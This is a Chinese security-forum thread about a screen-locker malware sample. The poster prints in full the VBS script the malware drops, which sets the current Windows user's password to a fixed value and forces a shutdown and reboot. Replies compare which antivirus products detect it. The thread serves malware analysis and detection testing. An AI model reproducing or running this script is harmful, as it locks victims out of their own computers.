查看: 1550|回复: 12
收起左侧

[病毒样本] 又是一枚锁机

[复制链接]
火绒爃
发表于 2021-2-24 21:50:48 | 显示全部楼层 |阅读模式
本帖最后由 火绒爃 于 2021-2-24 21:55 编辑

刚刚碰到的一个锁机软件,程序释放vbs脚本执行锁机命令,释放的锁机vbs代码如下
Const strPassword = "XXX"'   

Dim WshNetwork

Set WshNetwork = CreateObject("WScript.Network")

Dim userName

userName = WshNetwork.userName&",user"

Dim Domain

Set Domain = GetObject("WinNT://./"&userName)

Domain.SetPassword strPassword

Domain.SetInfo

dim gj



set gj=createobject("wscript.shell")



gj.run"shutdown -f -t"'

Set objWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")

                        objWMI.Security_.ImpersonationLevel=3

                        objWMI.Security_.Privileges.Add 18

                        Set colOS=objWMI.InstancesOf ("Win32_OperatingSystem where Primary=true")

                        For Each clsOS in colOS

                                clsOS.Reboot()

                        Next

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
hsks
发表于 2021-2-24 21:51:55 | 显示全部楼层
本帖最后由 hsks 于 2021-2-24 21:56 编辑

360,火绒,智量miss
小Q机器人
发表于 2021-2-24 21:53:01 | 显示全部楼层
智量扫描miss
火绒爃
 楼主| 发表于 2021-2-24 21:54:04 | 显示全部楼层
刚刚帮受害者分析出密码,发现火绒不报毒来分享一手
hsks
发表于 2021-2-24 21:58:02 | 显示全部楼层
z68436425
发表于 2021-2-24 21:58:08 | 显示全部楼层
ESET K了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
秋日之殇
发表于 2021-2-24 21:58:45 | 显示全部楼层
双击无反应,以管理员身份运行卡巴被过
anthonyqian
发表于 2021-2-24 22:14:58 | 显示全部楼层
诺顿WS.Reputation.1
tomochan
发表于 2021-2-24 22:23:41 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
火绒爃
 楼主| 发表于 2021-2-24 22:24:44 | 显示全部楼层
国产杀软识别恶意脚本的能力有待提高

评分

参与人数 1人气 +1 收起 理由
hsks + 1 赞一个!

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-4 23:56 , Processed in 0.161330 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表